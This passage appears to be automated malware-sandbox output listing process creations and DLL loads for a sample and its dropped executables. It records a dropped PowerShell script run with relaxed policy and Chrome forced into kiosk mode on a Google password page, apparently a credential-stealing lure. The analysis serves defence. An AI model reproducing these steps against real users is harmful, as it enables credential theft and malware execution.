Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1000140041\ko.ps1" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --kiosk --user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User" --mojo-platform-channel-handle=2256 --field-trial-handle=2024,i,122868655359159109,17278634962393556832,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User" --mojo-platform-channel-handle=4920 --field-trial-handle=2024,i,122868655359159109,17278634962393556832,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User" --mojo-platform-channel-handle=4812 --field-trial-handle=2024,i,122868655359159109,17278634962393556832,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: winmm.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: sspicli.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: wininet.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: ncrypt.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: ntasn1.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: iertutil.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: windows.storage.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: wldp.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: profapi.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: winhttp.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: mswsock.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: winnsi.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: urlmon.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: srvcli.dll
Source: C:\Users\user\1000115002\6b11689b40.exe Section loaded: netutils.dll
